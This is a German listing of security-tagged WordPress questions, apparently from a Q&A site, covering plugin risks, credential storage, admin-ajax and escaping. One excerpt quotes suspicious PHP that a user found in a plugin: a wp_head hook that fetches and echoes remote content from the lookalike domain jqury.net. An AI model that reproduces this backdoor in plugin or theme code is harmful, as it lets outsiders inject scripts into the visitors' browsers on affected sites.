Als «security» getaggte Fragen

Stärkung von Themen, Plugins und Kerninstallationen, um ein Eindringen zu verhindern.

6
Sind Wordpress-Plugins unerlässlich?
Ich bin neu in WordPress. Ich habe kürzlich einen Artikel darüber gelesen, wie Hacker Schwachstellen in Plugins ausnutzen können. Verschiedene Quellen wie Google Pagespeed haben mich auch davon abgehalten, Plugins zu verwenden oder zumindest auf ein Minimum zu beschränken. Ich persönlich versuche auch, Plugins zu meiden, weil ich mehr Kontrolle …
19 plugins  security 
3
Wie speichere ich Benutzername und Passwort für die API in der WordPress Option DB?
Ich entwickle gerade ein Plugin und die Chancen stehen gut, dass ich es höchstwahrscheinlich im öffentlichen Plugin-Repository veröffentlichen werde, damit andere es verwenden können. Das Plugin verwendet eine API. Um diese API zu verwenden, müssen Sie einen Benutzernamen und ein Kennwort übergeben. Daher muss mein Plugin diese Anmeldeinformationen in der …
2
Ich habe das in einem Plugin gefunden. Was tut es? ist es gefährlich?
Ich habe das in einem Plugin gefunden. Was tut es? ist es gefährlich? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }
3
Nach welchen allgemeinen Sicherheitslücken muss ich suchen? [geschlossen]
Aus heutiger Sicht passt diese Frage nicht zu unserem Q & A-Format. Wir erwarten, dass die Antworten durch Fakten, Referenzen oder Fachwissen gestützt werden, aber diese Frage wird wahrscheinlich Debatten, Argumente, Abstimmungen oder erweiterte Diskussionen hervorrufen. Wenn Sie der Meinung sind, dass diese Frage verbessert und möglicherweise erneut geöffnet werden …
4
Wie funktioniert admin-ajax.php?
Wir haben einige Probleme mit einem externen Entwickler. Wir möchten den Zugriff auf die wp-adminSite auf den internen Zugriff beschränken (über VPN ). Einfach so wird es nicht von externen Usern angegriffen. Wir können die Administratoren auf der Website auflisten und möchten nicht, dass sie gefälscht werden. Unser Entwickler sagt, …
14 admin  ajax  security 
1
Warum benötigt WordPress meinen privaten SSH-Schlüssel zum Aktualisieren?
Das Konfigurieren von WordPress zur Aktualisierung innerhalb der Anwendung (z. B. WordPress) ist für mich aufgrund seiner Benutzerfreundlichkeit ideal. Trotzdem stören mich die Anforderungen. Die angeforderten Felder, die nach der Installation von ssh2 für PHP angezeigt werden, fragen nicht nur meinen öffentlichen, sondern auch meinen privaten Schlüssel. Ich würde denken, …
13 security  updates  ssh 
1
Wie sicher / bereinigt ist wp_insert_posts ()?
Im Codex für wp_insert_post () heißt es, dass diese Funktion "... Variablen bereinigt , einige Überprüfungen durchführt, fehlende Variablen wie Datum / Uhrzeit usw. ausfüllt" (BEARBEITEN: Ich habe den Codex-Eintrag mit einem robusteren Beispiel aktualisiert das beinhaltet Sicherheit sowie Post-Meta und Kategoriezuweisung) Ich frage mich nur, ob ich eine weitere …
4
Warum sollte ich die esc_url verwenden?
Dieses Ding macht meine Codierung schwierig. Der Wordpress-Codex begründet die Verwendung von esc_url, indem er vage über Sicherheit spricht. Aber ist es die Mühe wirklich wert? Was ist zum Beispiel der wichtige praktische Sicherheitsvorteil bei der Verwendung? <?php echo esc_url( home_url( '/' ) ); ?> Anstatt von <?php echo home_url() …
12 security 
Durch die Nutzung unserer Website bestätigen Sie, dass Sie unsere Cookie-Richtlinie und Datenschutzrichtlinie gelesen und verstanden haben.
Licensed under cc by-sa 3.0 with attribution required.